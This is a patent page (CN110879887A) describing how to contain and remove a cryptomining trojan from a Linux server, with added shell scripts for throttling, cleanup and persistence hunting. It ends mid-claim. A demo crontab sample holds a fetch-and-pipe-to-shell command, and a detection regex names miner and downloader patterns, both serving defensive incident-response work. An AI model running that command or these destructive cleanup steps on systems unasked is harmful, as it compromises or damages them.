CN110879887A - Method, device, equipment and medium for repairing mining trojan program - Google Patents


Info

Publication number
CN110879887A
CN110879887A (application CN201911121661.9A; granted as CN110879887B)
Authority
CN
China
Prior art keywords
program
server
mining
trojan horse
trojan
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN201911121661.9A
Other languages
Chinese (zh)
Other versions
CN110879887B (en)
Inventor
吴波
范渊
刘博 (last character garbled in the source)
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Hangzhou Dbappsecurity Technology Co Ltd
Original Assignee
Hangzhou Dbappsecurity Technology Co Ltd
Application filed by Hangzhou Dbappsecurity Technology Co Ltd
Priority to CN201911121661.9A
Publication of CN110879887A
Application granted; publication of CN110879887B
Legal status: Active

Classifications

    • G06F 21/566: Computer malware detection or handling, dynamic detection performed at run-time (e.g. emulation, suspicious activities)
    • G06F 21/568: Computer malware detection or handling, eliminating the virus and restoring damaged files
    • G06F 21/577: Assessing vulnerabilities and evaluating computer system security
    (all under G Physics > G06 Computing; calculating or counting > G06F Electric digital data processing > G06F 21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity > G06F 21/50 Monitoring users, programs or devices to maintain the integrity of platforms)

Abstract

The application discloses a method, device, equipment and medium for remediating a cryptomining trojan. The method comprises: cutting off communication between the server compromised by the mining trojan and the outside; limiting the CPU usage of the mining trojan process so that the server's normal service applications recover; disabling the scheduled task belonging to the mining trojan and emptying the mining trojan program file; and finding and killing any mining trojan process still running after the program file has been emptied. Because communication is cut first and the miner's CPU usage is throttled before anything is deleted, the server's normal services come back quickly; because the scheduled task and the program file are dealt with before the process is killed, the process cannot be pulled up again by its daemon or restored on reboot, and propagation of the mining trojan across the local area network is suppressed.

Description

Method, device, equipment and medium for repairing mining trojan program
Technical Field
The application relates to the field of network security, in particular to a method, device, equipment and medium for remediating a mining trojan.
Background
Once a server that is reachable from the external network has been compromised by a mining trojan, most of its CPU is consumed by mining. The CPU runs flat out, power consumption rises sharply, and the services that originally ran on the server can no longer run normally for lack of resources. Existing remediation procedures for a mining trojan mainly take one of three forms. First: kill the mining process and its daemon process, then delete the mining program and its scheduled task, then block the attacker's host with the firewall. Second: kill the mining process and its daemon process, delete the mining program, the infected files and any suspicious files, and then delete the trojan's scheduled task. Third: delete the trojan's scheduled task, delete the infected and suspicious files, and then kill the mining process. In all of these procedures normal service recovers slowly, the mining process is pulled up again by its daemon as soon as it is killed, the trojan is restored on the next boot, and the server stays under the remote attacker's control.
Disclosure of Invention
In view of the above, the object of the present application is to provide a method, apparatus, device and medium for remediating a mining trojan that restore normal services on the compromised server quickly, and that leave the mining trojan process unable to be pulled up again after it is killed or restored after a reboot, so that the trojan cannot propagate across the local area network. The specific scheme is as follows:
In a first aspect, the application discloses a method for remediating a mining trojan, comprising the following steps:
cutting off communication between the server compromised by the mining trojan and the outside;
limiting the CPU usage of the server's mining trojan process so that the server's normal service applications recover;
disabling the scheduled task belonging to the mining trojan and emptying the mining trojan program file;
and finding and killing any mining trojan process that is still running after the program file has been emptied.
Optionally, cutting off communication between the compromised server and the outside includes:
preventing the server's vulnerable ports from being exposed to the outside;
regenerating the local SSH key pair and clearing the list of external hosts that may log in without a password;
modifying the DNS configuration in the server so that it can no longer resolve external domain names;
and moving target commands in the server from a source directory to a target directory, so that the mining trojan's daemon process cannot automatically fetch its latest code.
Optionally, preventing the server's vulnerable ports from being exposed to the outside includes:
closing the vulnerable port on the server;
and/or adding a firewall rule that blocks the vulnerable port from the outside.
Optionally, disabling the scheduled task and emptying the mining trojan program includes:
disabling the trojan's crond scheduled task;
and truncating the mining trojan program to an empty file and locking that empty file.
Optionally, after finding and killing the mining trojan process that is still running after the program file has been emptied, the method further includes:
disabling the mining trojan's start-on-boot entries;
cleaning the environment configuration files;
scanning for and removing residual mining trojan files with an antivirus tool;
and restoring the command environment in the server, which completes the remediation.
Optionally, limiting the CPU usage of the mining trojan process includes:
limiting the CPU usage of the mining trojan process with the cgroup facility so that the server's normal service applications recover.
Optionally, limiting the CPU usage with the cgroup facility includes:
creating a cgroup limit group;
and limiting the CPU usage of that cgroup limit group so that the server's normal service applications recover.
In a second aspect, the present application discloses a mining trojan remediation apparatus, including:
a communication cut-off module for cutting off communication between the server compromised by the mining trojan and the outside;
a limiting module for limiting the CPU usage of the server's mining trojan process so that the server's normal service applications recover;
a task disabling module for disabling the scheduled task belonging to the mining trojan;
a program emptying module for emptying the mining trojan program file;
and a process search-and-kill module for finding and killing any mining trojan process that is still running after the program file has been emptied.
In a third aspect, the present application discloses a mining trojan remediation device, comprising:
a memory and a processor;
wherein the memory is used to store a computer program;
and the processor is used to execute the computer program so as to carry out the mining trojan remediation method disclosed above.
In a fourth aspect, the present application discloses a computer-readable storage medium storing a computer program which, when executed by a processor, carries out the mining trojan remediation method disclosed above.
Thus the communication between the compromised server and the outside is cut off first; then the CPU usage of the mining trojan process is limited so that the server's normal service applications recover; then the trojan's scheduled task is disabled and the trojan program file is emptied; and finally any mining trojan process still running after the file has been emptied is found and killed. Cutting communication and throttling the miner before anything is deleted brings the server's normal services back quickly; disabling the scheduled task and emptying the program file before the process is killed means that the process cannot be pulled up again by its daemon or restored on reboot, so propagation of the mining trojan across the local area network is suppressed.
Drawings
In order to illustrate the embodiments of the present application or the prior art more clearly, the drawings used in their description are briefly introduced below. The drawings show only embodiments of the present application; those skilled in the art can derive other drawings from them without creative effort.
FIG. 1 is a flow chart of the mining trojan remediation method disclosed in the present application;
FIG. 2 is a flow chart of a specific mining trojan remediation method disclosed in the present application;
FIG. 3 is a flow chart of another specific mining trojan remediation method disclosed in the present application;
FIG. 4 is a schematic structural diagram of the mining trojan remediation apparatus disclosed in the present application;
FIG. 5 is a block diagram of the mining trojan remediation device disclosed in the present application;
FIG. 6 is a diagram of the server structure disclosed in the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be clearly and completely described below with reference to the drawings in the embodiments of the present application, and it is obvious that the described embodiments are only a part of the embodiments of the present application, and not all of the embodiments. All other embodiments, which can be derived by a person skilled in the art from the embodiments given herein without making any creative effort, shall fall within the protection scope of the present application.
The existing remediation procedures described in the Background (kill the process and its daemon, then delete the program and scheduled task and block the attacker with the firewall; or kill, delete the program and infected files, then delete the scheduled task; or delete the scheduled task and files, then kill the process) all share the same weaknesses: normal service recovers slowly, the mining process is pulled up again by its daemon after it is killed, the trojan is restored on the next boot, and the server remains under remote control. In view of this, the present application provides a method for remediating a mining trojan that restores normal service on the compromised server quickly and leaves the mining process unable to be pulled up again after it is killed or restored after a reboot, so that propagation of the trojan across the local area network is suppressed.
The embodiment of the application discloses a method for remediating a mining trojan, shown in figure 1, comprising the following steps:
Step S11: cut off communication between the server compromised by the mining trojan and the outside.
In this embodiment, once a server has been compromised by a mining trojan, its communication with the outside is cut off first, so that the trojan cannot spread within the local area network, compromise other devices there, and eventually take over the whole network.
Step S12: limit the CPU usage of the server's mining trojan process so that the server's normal service applications recover.
In a specific embodiment, after communication has been cut off, the CPU usage of the mining trojan process is limited. This removes the resource starvation that stops the original services from running and brings the normal service applications back quickly. The process is throttled rather than killed at this point: a mining trojan usually ships with a daemon (watchdog) process that restarts the miner as soon as it disappears, and killing the miner now would simply trigger that restart. Throttling leaves the process in place, so the watchdog sees nothing to restart, while the CPU is returned to the real services.
Step S13: disable the scheduled task belonging to the mining trojan and empty the mining trojan program file.
Once normal service has been restored, the trojan's scheduled task is disabled and the trojan program is emptied. The mining trojan program includes, but is not limited to, the trojan's script files and its binary executables.
Step S14: find and kill any mining trojan process that is still running after the program file has been emptied.
In a specific implementation, after the program file has been emptied, any mining trojan process that is still running is found and killed. Some mining processes remain running after their file is emptied, so those running processes are located and killed. Because the file on disk is now empty and locked and the scheduled task is gone, neither the daemon nor cron can bring a working copy back. After the processes have been killed, further clean-up is required to complete the remediation.
Referring to fig. 2, an embodiment of the present application discloses a specific method for remediating a mining trojan, which includes:
Step S21: prevent the server's vulnerable ports from being exposed to the outside.
In a specific implementation, cutting off communication between the compromised server and the outside starts with preventing the server's vulnerable ports from being exposed. This can be done by closing the vulnerable port on the server, by adding a firewall rule that blocks it from the outside, or both. For example, for port 2375 (the default TCP port of the unauthenticated Docker Remote API, a frequent entry point for mining trojans) inbound traffic can be dropped with:
iptables -I INPUT -p tcp --dport 2375 -j DROP
The rule is inserted (-I) at the top of the INPUT chain so that it takes precedence over any existing ACCEPT rule; like every iptables rule it is lost on reboot unless it is saved with the distribution's persistence mechanism.
Step S22: regenerate the SSH key pair and clear the list of external hosts that may log in without a password.
After the vulnerable ports have been blocked, the local SSH key pair is regenerated and the authorized_keys list, which holds the public keys allowed to log in without a password, is emptied. The server can then no longer be reached with keys the trojan planted, and the trojan cannot use the old private key to hop along existing trust relationships to other external hosts. For example (the second command of the original listing is garbled; the emptying step is reconstructed here):
ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa (generate a new local key pair)
echo > ~/.ssh/authorized_keys (empty the list of keys allowed to log in without a password)
The listing's note also mentions re-adding the local public key afterwards, which in its usual form is cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys. This has to be repeated for every account that has a ~/.ssh directory, not only the account the responder is logged in as; ~/.ssh/known_hosts on the compromised server is also worth reading, since it lists the hosts the trojan may already have reached.
Step S23: modify the DNS configuration in the server so that it cannot resolve external domain names.
In a specific implementation, once the passwordless login list has been emptied, the Domain Name System (DNS) configuration of the server is modified so that external domain names no longer resolve and the server cannot reach the internet by name. This is done by commenting out every nameserver line in /etc/resolv.conf. Note that this only breaks name resolution: a trojan that connects to its mining pool or download server by IP address is unaffected, so the DNS change should be paired with the port blocking above or an egress firewall rule. On systems where /etc/resolv.conf is generated by systemd-resolved or NetworkManager the edit may be overwritten unless that service is stopped first.
Step S24: move target commands in the server from a source directory to a target directory, so that the mining trojan's daemon process cannot automatically fetch its latest code.
In this embodiment, to stop the trojan's daemon from re-downloading the miner, the download commands it relies on are moved out of the server's command path. The target commands include, but are not limited to, wget, curl and scp; the source directory includes, but is not limited to, /usr/bin; the target directory includes, but is not limited to, /home. For example:
mv /usr/bin/wget /home/wget.bak
and likewise for curl and scp. This is a speed bump rather than a guarantee: a daemon that carries its own downloader, or that fetches files with python or perl, is not affected, which is why the DNS and firewall changes are made as well. The moved commands are put back in step S312.
Step S25: limit the CPU usage of the server's mining trojan process with cgroups so that the server's normal service applications recover.
In this embodiment, after the server has been cut off from the outside, the CPU usage of the mining trojan process is restricted so that normal service applications recover. Specifically, a cgroup limit group is created, its CPU usage is capped, and the mining process is placed in that group. For example, with the cgroup v1 cpu controller:
mkdir /sys/fs/cgroup/cpu/tmplimit (create the cgroup limit group)
echo 1000 > /sys/fs/cgroup/cpu/tmplimit/cpu.cfs_quota_us (limit the CPU usage of the group: 1000 us of CPU time per 100000 us period, i.e. about 1 percent of one core)
echo [PID] > /sys/fs/cgroup/cpu/tmplimit/cgroup.procs (move the mining process into the group)
The original listing writes the value into a group named container and into cpu.cfs_period_us; the group created by the first command is tmplimit, and cpu.cfs_period_us only sets the length of the scheduling window (100000 us by default), so the file that actually caps the process is cpu.cfs_quota_us. The listing also omits the last command, without which the group limits nothing. On a host that uses the unified cgroup v2 hierarchy the equivalent is a directory under /sys/fs/cgroup, with the cpu controller enabled in cgroup.subtree_control and the pair "1000 100000" written to that directory's cpu.max file.
Step S26: disable the trojan's crond scheduled task.
In a specific implementation, the scheduled task belonging to the mining trojan also has to be disabled; that is, the crond entry the trojan installed is removed. For example, crontab -e opens the current user's crontab for editing so that the trojan's line can be deleted (crontab -l lists it first, and crontab -r removes the whole crontab). Mining trojans also write to /etc/crontab, /etc/cron.d/*, /var/spool/cron/* and the crontabs of other users such as root, so each of those locations should be checked.
Step S27: truncate the mining trojan program to an empty file and lock the empty file.
In this embodiment, after the scheduled task has been disabled, the trojan program is truncated to an empty file and that empty file is locked. Specifically, the program file is located through the PID of the mining process (the /proc/[PID]/exe link points at the executable even if it has been renamed); because the trojan usually sets the immutable attribute on its own files, that attribute is removed first, the file is then emptied, and the now-empty file is made immutable. Emptying and locking, rather than deleting, means that the file name the daemon and the cron entry expect still exists but holds nothing executable, so any attempt to relaunch it fails. For example, where A is the path the first command prints for the executable:
ls -l /proc/[PID]/exe (find the mining trojan program through the PID of the mining process)
chattr -i A (remove the immutable attribute from the mining trojan program)
echo > A (empty the mining trojan program)
chattr +i A (lock the empty file)
If /proc/[PID]/exe is shown as "(deleted)", the trojan has already removed its own file and is running from the orphaned inode; a copy for analysis can still be taken from /proc/[PID]/exe before the process is killed.
Step S28: find and kill any mining trojan process that is still running after the program file has been emptied.
In this embodiment, with the trojan program truncated and locked, any mining process that is still running is found and killed. For example: kill -9 [PID]. SIGKILL cannot be caught or ignored by the process. If the trojan has a separate daemon (watchdog) process, it is killed the same way; because the file it would re-execute is now empty and immutable and the cron entry is gone, the daemon has nothing left to restart.
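The following shell script gathers steps S21 to S28 (and the four steps S11 to S14 they refine) into functions in the order the page prescribes. It is an added example, not code from the patent or from the assignee: the DRY_RUN switch, the function names, the tmplimit group and the quarantine directory default are assumptions, and it assumes a Linux host with iptables, chattr and the cgroup v1 cpu controller. With DRY_RUN left at 1 it only prints the privileged commands, so it can be read and tested on any host; run it as root with DRY_RUN=0 to apply them.

```shell
#!/bin/sh
# Containment and throttling for a mining trojan, steps S21-S28 of the page,
# as shell functions. Added example, not the patent's own code. DRY_RUN=1
# (default) prints the privileged commands instead of running them.
set -u
DRY_RUN="${DRY_RUN:-1}"
CGROUP_ROOT="${CGROUP_ROOT:-/sys/fs/cgroup/cpu}"  # cgroup v1 cpu controller (assumption)
QUARANTINE_DIR="${QUARANTINE_DIR:-/home}"         # target directory named on the page

run() {  # print or execute a privileged command
  if [ "$DRY_RUN" = "1" ]; then printf '[dry-run] %s\n' "$*"; else "$@"; fi
}

# S21: drop inbound TCP to an exposed vulnerable port (2375 on the page, the
# unauthenticated Docker Remote API). -I puts the rule ahead of any ACCEPT.
block_port() { run iptables -I INPUT -p tcp --dport "$1" -j DROP; }

# S22: new key pair and an emptied authorized_keys for one account's home.
# Repeat for every account that has a ~/.ssh directory.
reset_ssh() {
  home="$1"
  run ssh-keygen -t rsa -P "" -f "$home/.ssh/id_rsa" -q
  run sh -c ": > '$home/.ssh/authorized_keys'"
}

# S23: comment out every nameserver so pool and download names stop resolving.
disable_dns() { run sed -i 's/^[[:space:]]*nameserver/#nameserver/' /etc/resolv.conf; }

# S24: move the download tools the daemon would use to re-fetch its payload.
quarantine_tools() {
  for t in wget curl scp; do
    [ -e "/usr/bin/$t" ] && run mv "/usr/bin/$t" "$QUARANTINE_DIR/$t.bak"
  done
  return 0
}

# S25 helper: CFS quota in microseconds for a percentage of one core. With the
# default 100000 us period, 1 percent is 1000 us, the value the page writes.
cpu_quota_us() { echo $(( ${2:-100000} * $1 / 100 )); }

# S25: create the limit group, set the quota, and move the miner PID into it.
# The page's listing omits the last write, without which nothing is limited.
throttle_pid() {
  pid="$1"; percent="${2:-1}"; grp="$CGROUP_ROOT/tmplimit"
  run mkdir -p "$grp"
  run sh -c "echo $(cpu_quota_us "$percent") > '$grp/cpu.cfs_quota_us'"
  run sh -c "echo $pid > '$grp/cgroup.procs'"
}

# S27: resolve the on-disk binary from the PID, then unlock, empty, relock it.
exe_of_pid() { readlink -f "/proc/$1/exe" 2>/dev/null || true; }
neutralize_file() {
  run chattr -i "$1"
  run sh -c ": > '$1'"
  run chattr +i "$1"
}

# S26 / S28: drop the user's crontab; SIGKILL the now file-less process.
purge_crontab() { run crontab -r -u "${1:-root}"; }
kill_pid() { run kill -9 "$1"; }

# The whole sequence in the page's order for one miner PID.
contain_miner() {
  block_port 2375
  reset_ssh /root
  disable_dns
  quarantine_tools
  throttle_pid "$1" 1
  purge_crontab root
  exe="$(exe_of_pid "$1")"
  [ -n "$exe" ] && neutralize_file "$exe"
  kill_pid "$1"
}

# Usage: DRY_RUN=1 sh contain.sh <miner-pid>
if [ $# -ge 1 ]; then contain_miner "$1"; fi
```

The order matters more than any single command: the miner is throttled, its cron entry removed and its file emptied before the kill, so the watchdog that would normally re-exec it finds an immutable empty file and exits with an error instead.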
Referring to fig. 3, an embodiment of the present application discloses a specific method for remediating a mining trojan, including:
Step S301: prevent the server's vulnerable ports from being exposed to the outside.
Step S302: regenerate the SSH key pair and clear the list of external hosts that may log in without a password.
Step S303: modify the DNS configuration in the server so that it cannot resolve external domain names.
Step S304: move target commands in the server from a source directory to a target directory, so that the mining trojan's daemon process cannot automatically fetch its latest code.
Step S305: limit the CPU usage of the server's mining trojan process with cgroups so that the server's normal service applications recover.
Step S306: disable the trojan's crond scheduled task.
Step S307: truncate the mining trojan program to an empty file and lock the empty file.
Step S308: find and kill any mining trojan process that is still running after the program file has been emptied.
Step S309: disable the mining trojan's start-on-boot entries.
In this embodiment, after the running mining processes have been killed, the entries that would start the trojan again at boot are disabled. Specifically, the suspicious files under /etc/rc.d can be deleted. Review each entry before deleting it, since the same directory holds legitimate init scripts. Boot persistence is not limited to /etc/rc.d: /etc/rc.local, /etc/init.d and systemd unit files under /etc/systemd/system (listed with systemctl list-unit-files --state=enabled) serve the same purpose and should be checked as well.
Step S310: clean the environment configuration files.
In a particular implementation, the environment configuration files also have to be cleaned; specifically, suspicious script lines added to the bashrc file are removed. The same applies to /etc/profile, /etc/profile.d/*, /etc/bash.bashrc and the .bash_profile and .profile files in user home directories, all of which run code at login.
Step S311: scan for and remove residual mining trojan files with an antivirus tool.
In case parts of the mining trojan remain, the residual files are found with an antivirus tool; specifically, the open-source antivirus tool ClamAV (clamscan -r over the filesystem) can be used. Because the server was cut off from the outside in steps S301 to S304, ClamAV's signature update (freshclam) will not work on it; update the signatures on a clean host and copy them over, or accept that the scan runs with the signatures already installed.
Step S312: restore the command environment in the server, which completes the remediation.
In this embodiment, after the residual trojan files have been dealt with, the command environment of the server is restored to complete the remediation. For example, during the procedure the system command chattr is renamed to chattr.bak so that the trojan cannot re-lock its files; once the trojan has been cleaned up, chattr.bak must be renamed back to chattr. The download commands moved in step S304 (wget.bak, curl.bak and scp.bak under /home) are moved back to /usr/bin in the same way, and the firewall and DNS changes are reverted once the vulnerable service has been patched or disabled.
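The clean-up steps S309 to S312 as an added shell example (not the patent's own code): a persistence hunt that reports suspicious lines in the cron, boot and login files the page names plus the other standard autostart locations, a check of /etc/ld.so.preload (which miners use to hide their process from ps and top), and a restore function for the renamed commands. The indicator pattern, the location list, the function names and the DRY_RUN switch are assumptions to tune per incident; the crontab lines in the demo function are constructed (203.0.113.0/24 is a documentation address range).

```shell
#!/bin/sh
# Persistence hunt and restore for steps S309-S312. Added example, not the
# patent's own code; pattern and paths are a starting point, not a signature.
set -u
DRY_RUN="${DRY_RUN:-1}"
run() { if [ "$DRY_RUN" = "1" ]; then printf '[dry-run] %s\n' "$*"; else "$@"; fi; }

# Indicators typical of miner droppers: download-and-pipe, base64 payloads,
# binaries parked in /tmp or /dev/shm, self-locking with chattr, miner and
# pool names, and writes to the preload hook.
SUSPECT_RE='(curl|wget)[^#]*https?://|base64[[:space:]]+(-d|--decode)|/dev/shm/|/tmp/\.?[A-Za-z0-9_-]+|nohup[[:space:]]|chattr[[:space:]]+\+i|xmrig|stratum\+tcp|ld\.so\.preload'

# Locations the page names (cron, /etc/rc.d, bashrc) plus the other places
# that run code at boot or login on a typical Linux server.
PERSISTENCE_PATHS="/etc/crontab /etc/cron.d /var/spool/cron /etc/rc.d /etc/rc.local
 /etc/init.d /etc/systemd/system /etc/profile /etc/profile.d /etc/bash.bashrc
 /root/.bashrc /root/.bash_profile /root/.profile"

# Print file:line:text for every non-comment line in the given files that
# matches SUSPECT_RE. Missing files are skipped silently.
flag_suspicious() {
  grep -nHE -- "$SUSPECT_RE" "$@" 2>/dev/null \
    | grep -vE '^[^:]*:[0-9]+:[[:space:]]*#' || true
}
count_suspicious() { flag_suspicious "$@" | wc -l | tr -d ' '; }

# Walk the persistence paths (directories recursively) and flag their lines.
hunt_persistence() {
  for p in $PERSISTENCE_PATHS; do
    [ -e "$p" ] || continue
    find "$p" -type f -exec grep -nHE -- "$SUSPECT_RE" {} + 2>/dev/null
  done | grep -vE '^[^:]*:[0-9]+:[[:space:]]*#' || true
}

# /etc/ld.so.preload is mapped into every dynamically linked process; a
# non-empty file on a server that never needed one is itself an indicator.
check_ld_preload() {
  f="${1:-/etc/ld.so.preload}"
  if [ -s "$f" ]; then echo "ld.so.preload is non-empty:"; cat "$f"; return 1; fi
  return 0
}

# S312: put a renamed command back; never clobber an existing target.
restore_command() {
  if [ -e "$2" ]; then echo "refusing: $2 exists" >&2; return 1; fi
  run mv "$1" "$2"
}
restore_tools() {
  restore_command /usr/bin/chattr.bak /usr/bin/chattr
  for t in wget curl scp; do restore_command "/home/$t.bak" "/usr/bin/$t"; done
  return 0
}

# Constructed crontab sample showing the output format when run stand-alone.
demo() {
  d="$(mktemp -d)"
  printf '%s\n' \
    '*/10 * * * * (curl -fsSL http://203.0.113.5/x.sh || wget -q -O- http://203.0.113.5/x.sh) | sh' \
    '0 3 * * * /usr/bin/logrotate /etc/logrotate.conf' > "$d/crontab"
  flag_suspicious "$d/crontab"      # only the first line is reported
  rm -rf "$d"
}
if [ "${1:-}" = "demo" ]; then demo; fi
```

Usage: sh hunt.sh demo prints the flagged sample line; on a real host, source the file and call hunt_persistence, then check_ld_preload, and finish with DRY_RUN=0 restore_tools once the trojan is gone. Reported lines are leads to review, not a verdict: a backup script that uses curl will be flagged too.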
Referring to fig. 4, an embodiment of the present application discloses a mining trojan remediation apparatus, including:
a communication cut-off module 11 for cutting off communication between the server compromised by the mining trojan and the outside;
a limiting module 12 for limiting the CPU usage of the server's mining trojan process so that the server's normal service applications recover;
a task disabling module 13 for disabling the scheduled task belonging to the mining trojan;
a program emptying module 14 for emptying the mining trojan program file;
and a process search-and-kill module 15 for finding and killing any mining trojan process that is still running after the program file has been emptied.
Further, referring to fig. 5, an embodiment of the present application further discloses a mining Trojan program repair device, including: a processor 21 and a memory 22.
Wherein the memory 22 is used for storing a computer program; the processor 21 is configured to execute the computer program to implement the method for repairing the mining Trojan horse program disclosed in the foregoing embodiment.
For the specific process of the method for repairing the mining Trojan horse program, reference may be made to the corresponding contents disclosed in the foregoing embodiments, and details are not repeated herein.
Referring to fig. 6, the present application discloses a server 20 including a mining Trojan program repair device including a processor 21 and a memory 22 in the foregoing embodiment. For the steps that the processor 21 can specifically execute, reference may be made to corresponding contents disclosed in the foregoing embodiments, and details are not described herein again.
Further, the server 20 in this embodiment may further specifically include: a power supply 23, a communication interface 24, an input/output interface 25, and a communication bus 26; the power supply 23 is configured to provide a working voltage for each hardware device on the server 20; the communication interface 24 can be a data transmission channel between the server 20 and an external device, and the communication protocol it follows is any communication protocol that can be used in the technical solution of the present application, and is not specifically limited herein; the input/output interface 25 is configured to obtain data input from the outside or output data to the outside, and its specific interface type may be selected according to the specific application requirement, which is not specifically limited herein.
Further, an embodiment of the present application also discloses a computer readable storage medium for storing a computer program, wherein the computer program, when executed by a processor, implements the following steps:
cutting off the communication between the server attacked by the mining Trojan program and the outside; limiting the CPU usage of the mining Trojan process of the server to recover the normal service applications of the server; closing the timed task in the mining Trojan program, and emptying the mining Trojan program; and checking and killing the mining Trojan process that is still running after the Trojan program has been emptied.
Therefore, the communication between the server attacked by the mining Trojan program and the outside is cut off first; then the CPU usage of the server's mining Trojan process is limited so as to recover the normal service applications of the server; then the timed task in the mining Trojan program is closed and the mining Trojan program is emptied; and then the mining Trojan process that is still running after the Trojan program has been emptied is checked and killed. Because the communication is cut off first, the CPU usage of the mining Trojan process is then limited so that the server's normal service applications recover, the timed task is then closed and the corresponding mining Trojan program emptied, and the mining Trojan process that is still running is finally checked and killed, the normal services on a server invaded by a mining Trojan program can be rapidly recovered, the mining Trojan process is neither automatically pulled up again nor automatically restored after a reboot once it has been killed, and the propagation of the mining Trojan program across the local area network is restrained.
In this embodiment, when the computer program stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: limiting the port vulnerability of the server from being exposed to the outside; regenerating the key and clearing the external-network hosts that can be logged into without a password; modifying the DNS in the server so that the server cannot resolve external-network domain names; and moving a target command in the server from its source directory to a target directory to prevent a daemon process of the mining Trojan program from automatically pulling the latest code.
In this embodiment, when the computer program stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: closing a vulnerable port in the server to limit the port vulnerability of the server from being exposed to the outside; and/or adding a firewall to limit the port vulnerability of the server from being exposed to the outside.
In this embodiment, when the computer program stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: closing the crond timed task of the mining Trojan program; and modifying the mining Trojan program into an empty file, and locking the empty file.
In this embodiment, when the computer program stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: disabling the mining Trojan program's automatic start at boot; processing the environment configuration file; using a virus-killing tool to check and kill the residual mining Trojan program; and restoring the command environment in the server to complete the repair of the mining Trojan program.
In this embodiment, when the computer program stored in the computer-readable storage medium is executed by the processor, the following step may be specifically implemented: limiting the CPU usage of the mining Trojan process of the server by using cgroup technology so as to recover the normal service applications of the server.
In this embodiment, when the computer program stored in the computer-readable storage medium is executed by the processor, the following steps may be specifically implemented: creating a cgroup restriction group; and limiting the CPU usage of the cgroup restriction group to recover the normal service applications of the server.
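As an added example that is not part of the patent, the cgroup restriction-group step (claims 6 and 7) and the empty-and-lock step of the storage-medium embodiment written as POSIX shell functions for a defender running the repair on a compromised Linux host. It assumes the cgroup v1 cpu controller mounted at /sys/fs/cgroup/cpu; the CGROUP_ROOT variable, the function names and the 100 ms CFS period are choices of this example, and CGROUP_ROOT can point at a scratch directory to dry-run the functions without root.

```shell
#!/bin/sh
# Added example, not the patent's code. Caps the CPU share of a suspected
# mining process with a cgroup v1 restriction group, then empties and locks
# the miner's file so a cron job or daemon that re-executes it gets nothing.
# Assumption: cgroup v1 "cpu" controller mounted at $CGROUP_ROOT (needs root
# on a real host; point CGROUP_ROOT at a scratch directory for a dry run).

CGROUP_ROOT="${CGROUP_ROOT:-/sys/fs/cgroup/cpu}"

# create_limit_group NAME PERCENT
# Creates the restriction group NAME and sets a CFS quota so all tasks in it
# together get at most PERCENT of one CPU. Prints the quota in microseconds.
create_limit_group() {
    name=$1; percent=$2
    [ "$percent" -ge 1 ] && [ "$percent" -le 100 ] || return 2
    dir="$CGROUP_ROOT/$name"
    mkdir -p "$dir" || return 1
    period=100000                          # 100 ms period, in microseconds
    quota=$((period * percent / 100))      # e.g. 10% -> 10000 us per period
    printf '%s\n' "$period" > "$dir/cpu.cfs_period_us" || return 1
    printf '%s\n' "$quota"  > "$dir/cpu.cfs_quota_us"  || return 1
    printf '%s\n' "$quota"
}

# confine_pid NAME PID
# Moves PID into the restriction group: it keeps running (so forensics are
# still possible) but can no longer starve the server's service applications.
confine_pid() {
    dir="$CGROUP_ROOT/$1"
    [ -d "$dir" ] || return 1
    printf '%s\n' "$2" >> "$dir/tasks"
}

# empty_program_file PATH
# Truncates the miner program to a zero-length file, keeping the path so a
# scheduled task that calls it finds an empty file rather than a fresh copy.
empty_program_file() {
    f=$1
    [ -e "$f" ] || return 1
    : > "$f" || return 1
    [ ! -s "$f" ]
}

# lock_program_file PATH
# Locks the emptied file with the immutable attribute (ext4/xfs, root only),
# which is what the patent's "locking the empty file" step amounts to here.
lock_program_file() {
    command -v chattr >/dev/null 2>&1 || return 1
    chattr +i "$1"
}
```

Run the group creation before killing anything: a miner that is confined first cannot saturate the CPU while the remaining cleanup steps (cron removal, file emptying, process kill) are carried out.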
The embodiments are described in a progressive manner, each embodiment focuses on differences from other embodiments, and the same or similar parts among the embodiments are referred to each other. The device disclosed by the embodiment corresponds to the method disclosed by the embodiment, so that the description is simple, and the relevant points can be referred to the method part for description.
The steps of a method or algorithm described in connection with the embodiments disclosed herein may be embodied directly in hardware, in a software module executed by a processor, or in a combination of the two. A software module may reside in Random Access Memory (RAM), memory, Read Only Memory (ROM), electrically programmable ROM, electrically erasable programmable ROM, registers, hard disk, a removable disk, a CD-ROM, or any other form of storage medium known in the art.
Finally, it is further noted that, herein, relational terms such as first and second, and the like may be used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Also, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of other elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other identical elements in a process, method, article, or apparatus that comprises the element.
The method, device, equipment and medium for repairing a mining Trojan program provided by the application have been introduced in detail above; a specific example is used herein to explain the principle and implementation of the application, and the description of the embodiments is only intended to help understand the method and core idea of the application. Meanwhile, for a person skilled in the art, there may be variations in the specific embodiments and the application scope according to the idea of the present application; in summary, the content of this specification should not be construed as a limitation of the present application.

Claims (10)

1. A mining Trojan program repairing method is characterized by comprising the following steps:
cutting off the communication between the server attacked by the mining Trojan horse program and the outside;
limiting CPU usage of the mining Trojan horse process of the server to recover normal service application of the server;
closing a timed task in the mining Trojan program and emptying the mining Trojan program;
and checking and killing the mining Trojan horse process which is still in the running state after the Trojan horse program is emptied.
2. The method for repairing a mining Trojan horse program according to claim 1, wherein the cutting off communication between the server attacked by the mining Trojan horse program and the outside comprises:
limiting the port vulnerability of the server from being exposed to the outside;
regenerating the key and emptying the external network host which can be logged in without secret;
modifying the DNS in the server so that the server cannot resolve the outer network domain name;
and moving a target instruction in the server from a source directory to a target directory to prevent a daemon process of the mining Trojan horse program from automatically pulling the latest code.
3. The method according to claim 2, wherein limiting the port vulnerability of the server from being exposed to the outside comprises:
